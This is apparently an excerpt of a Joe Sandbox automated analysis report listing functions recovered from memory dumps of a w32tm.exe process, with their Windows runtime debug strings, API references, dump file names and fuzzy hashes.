                                                                                                                              • Instruction Fuzzy Hash: 1A110074C0138D9FCF44EFA4E546ADFBBB0FF14200F10555AD519A7250E73896548BD6
                                                                                                                              Strings
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 034102BD
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 034102E7
                                                                                                                              • RTL: Re-Waiting, xrefs: 0341031E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: c10a34793e0d6e17ef615e4eff10c889e0919d78e7f07af15e34a5b34f677421
                                                                                                                              • Instruction ID: e0b00e3e41aa6f42b976f445fa48ebfc88b12286e1a101bd4efff6bd5b90962f
                                                                                                                              • Opcode Fuzzy Hash: c10a34793e0d6e17ef615e4eff10c889e0919d78e7f07af15e34a5b34f677421
                                                                                                                              • Instruction Fuzzy Hash: 60E1DF30614B819FD725CF28C884B2AB7E5BF88324F180A5EF4A58B3E1D774D895CB46
                                                                                                                              Strings
                                                                                                                              • RTL: Resource at %p, xrefs: 03417B8E
                                                                                                                              • RTL: Re-Waiting, xrefs: 03417BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03417B7F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: d1bc407ed81b68c512817377867fcf4504f279a8ae6ce5fbe4c09a35ccaf8a6b
                                                                                                                              • Instruction ID: 4d4e909c72023f49d29677739bda71279995be4627bde4852f28cd72a4c9244c
                                                                                                                              • Opcode Fuzzy Hash: d1bc407ed81b68c512817377867fcf4504f279a8ae6ce5fbe4c09a35ccaf8a6b
                                                                                                                              • Instruction Fuzzy Hash: 7241C0367007029FCB24DE25EC80B6BB7E9EF89710F140A1EF95A9F680DB31E4058B95
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0341728C
                                                                                                                              Strings
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03417294
                                                                                                                              • RTL: Resource at %p, xrefs: 034172A3
                                                                                                                              • RTL: Re-Waiting, xrefs: 034172C1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: d33707ef924b3ab2a6b080be230da61ba68ffea8fafc3d442fe176ce76dbe083
                                                                                                                              • Instruction ID: 35d732b942b65071cd953b34951c9599e8b0bbe1ea33b73567adc8585324b77a
                                                                                                                              • Opcode Fuzzy Hash: d33707ef924b3ab2a6b080be230da61ba68ffea8fafc3d442fe176ce76dbe083
                                                                                                                              • Instruction Fuzzy Hash: 36411036700702AFC720DE25CC81B6AFBA9FF44710F24061AF855AF780DB21E85687D8
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: b97885cbabbf6dd94a4f6853727b4c85259d624cb17fac52ae65a7846803974b
                                                                                                                              • Instruction ID: 36ebb2e86728e60333b785e10c9f803e5601f547154c334758e7d2f0dc972b82
                                                                                                                              • Opcode Fuzzy Hash: b97885cbabbf6dd94a4f6853727b4c85259d624cb17fac52ae65a7846803974b
                                                                                                                              • Instruction Fuzzy Hash: 82317776E002199ECB60DE39CC40BEFB7A8EB54610F440597EC49E7241EB709A498B60
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634223783.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3280000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: u^$ u^$ u^$ u^$ u^
                                                                                                                              • API String ID: 0-794342075
                                                                                                                              • Opcode ID: 83497f6396812eaa66781c26f220e42ac165d80873a4551139468eceafdcb455
                                                                                                                              • Instruction ID: 7df194517e63809f019cf27c7e15a92a5f95d07d34858197fb166f358ac03372
                                                                                                                              • Opcode Fuzzy Hash: 83497f6396812eaa66781c26f220e42ac165d80873a4551139468eceafdcb455
                                                                                                                              • Instruction Fuzzy Hash: 33F0F474C0139D8FCF44EFE1A6069EFBAB4FB04240F10654AC52AA6250E37896418FD6
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-
                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction ID: dbde9ddefc5d90cd509ec321d44d3d1ede28fe989bf141c4209fc3e3cf6d3803
                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                              • Instruction Fuzzy Hash: 9C919474E002369BDF24DF69CCC1ABEB7A5FF84721F18461AE865EB2D0E73499428750
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $$@
                                                                                                                              • API String ID: 0-1194432280
                                                                                                                              • Opcode ID: d4175ddbff0f0c7eb270b97d75f0f7a036e5c1e4f4f42be7dc69cbffe042bf53
                                                                                                                              • Instruction ID: 42a7c198034d355b0be3cc812497b14ff64df94e93ad19674fafd24d33268205
                                                                                                                              • Opcode Fuzzy Hash: d4175ddbff0f0c7eb270b97d75f0f7a036e5c1e4f4f42be7dc69cbffe042bf53
                                                                                                                              • Instruction Fuzzy Hash: 40814D75D006699BDB21DF54CC84BEEB7B8AF08710F0445EAE919BB290D7709E80CFA4
                                                                                                                              APIs
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 0342CFBD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 0000000E.00000002.4634316635.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                              • Associated: 0000000E.00000002.4634316635.0000000003499000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000349D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 0000000E.00000002.4634316635.000000000350E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_14_2_3370000_w32tm.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8
                                                                                                                              • String ID: @$@4Cw@4Cw
                                                                                                                              • API String ID: 4062629308-3101775584
                                                                                                                              • Opcode ID: b5b25aeb76a2da23b79680b116c71e79e5e1521ef4c5a2483829095dbec5041e
                                                                                                                              • Instruction ID: cfe7d112688ae3cabd8501c7d0ec43cd4c5ea226ed934d2b99b300ecdddc7980
                                                                                                                              • Opcode Fuzzy Hash: b5b25aeb76a2da23b79680b116c71e79e5e1521ef4c5a2483829095dbec5041e
                                                                                                                              • Instruction Fuzzy Hash: 17418C75D00224DEDB21DF99C880AAEBBB8FF46B14F05412BE924EF264D734D801CB69